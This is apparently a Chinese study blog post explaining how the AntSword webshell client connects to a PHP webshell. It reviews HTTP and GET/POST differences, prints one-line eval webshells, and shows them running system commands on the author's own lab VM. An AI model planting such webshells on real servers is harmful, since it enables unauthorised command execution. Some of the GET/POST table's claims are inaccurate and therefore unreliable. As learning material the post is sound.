蚁剑原理

字数统计: 748 | 阅读时长≈ 2 分钟

http协议

属于应用层的面向对象的协议，五大特点：

1.支持C/S，2.简单快速，3.灵活，4.无连接，5.无状态

无连接：一次只处理一个请求，请求时建立连接，请求完释放连接

无状态：每次请求都是独立的，服务器没有保存客户端的状态，客户端必须每次带上自己的状态请求服务器

cookie和session用于保持HTTP的连接状态，交互可以承前启后

短连接和长连接

在 HTTP/1.0 中，默认使用的是短连接

从 HTTP/1.1 起，默认使用长连接，用以保持连接特性，响应头会有 Connection:keep-alive

之所以要写篇这个，是因为之前我只是文件上传的时候去使用，工具一连上木马，进入虚拟终端，就可以输入命令执行了

现在突然意识到，嘶，为什么呢？

为什么工具可以连上木马呢？

为了解决上面的问题，我先打开我的centos，启动xampp，去目标网站上传一个小马

虚拟机里写个get方法的小马

<?php @eval($_GET['cmd']); ?> @就是不报错

eval就是将里面的字符串当做代码处理了

主机去访问，http://192.168.1.89/get.php?cmd=system("dir"); 注意分号，不然这个代码不完整，会报错

system(“cat cors.php”)

**system(ifconfig);，当然，准确来说是“ifconfig”**，都行

<?php eval($_POST['cmd']); ?>

~~这什么hackbar，用不了啊！！~~

bp！！！！启动！

哦，火狐的hackbar，可以

添加数据：

url地址：http://192.168.1.89/post.php

连接密码: cmd

连接后进入虚拟终端：输入dir

试试连接get.php，返回数据为空，连不了

webshell工具和木马连接就相当于是用bp进行了POST请求

相比bp而言，更持久，界面更简洁易懂

虚拟终端是自动调用system，发送post包，利用参数发包，接收回复，图形化

GET和POST的区分再记录一下

	GET	POST
功能	从服务器上获取资源	更新服务器资源
参数	请求数据放在请求头中	提交数据放在HTTP报文的请求体中
安全	低，提交的数据明文出现在URL上	安全性高，因为请求参数包装到了请求体中
大小	受限于浏览器/服务器对URL的限制	大小没有限制
数据包	一个TCP包，一并发送请求头和数据，服务器响应200	两个TCP包，先发送请求头，服务器响应100continue后，再发送数据，然后响应200ok
参数类型	只接受ASCLL码	支持多种编码模式
幂等性	幂等	不是幂等

http://t.csdn.cn/WBLV3 从小马本身入手，再到工具

http://t.csdn.cn/oX71Z 末尾的一段话